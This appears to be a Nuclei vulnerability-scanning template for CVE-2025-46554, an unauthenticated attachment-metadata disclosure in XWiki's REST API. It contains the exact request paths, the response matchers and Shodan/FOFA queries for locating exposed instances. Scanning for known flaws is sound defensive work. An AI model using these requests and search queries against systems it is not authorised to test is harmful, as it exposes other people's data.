id: CVE-2025-46554

info:
  name: XWiki REST API - Attachments Disclosure
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in XWiki's REST API allows unauthenticated users to access attachments list and metadata through the attachments endpoint. This could lead to disclosure of sensitive information stored in attachments metadata.
  impact: |
    Unauthenticated users can access attachment lists and metadata through the REST API attachments endpoint, potentially exposing sensitive information.
  remediation: |
    Upgrade to the latest XWiki version that implements proper authorization checks for the attachments REST API endpoint.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-22424
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46554
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-285
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,rest-api,exposure,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}"

    payloads:
      path:
        - "rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments"
        - "xwiki/rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(header, 'text/xml', 'text/javascript')"
          - "contains_all(body, '<attachments', '<item', '<longSize')"
        condition: and
# digest: 4a0a0047304502206177deff6ff948bb176ed1b03d3ce3babb2b0a4b649fc427cb661942fec55910022100e0c0a62453b2f0915dab21441469a47740394704e6431a3f458b490e5cf7faa9:922c64590222798bb761d5b6d8e72950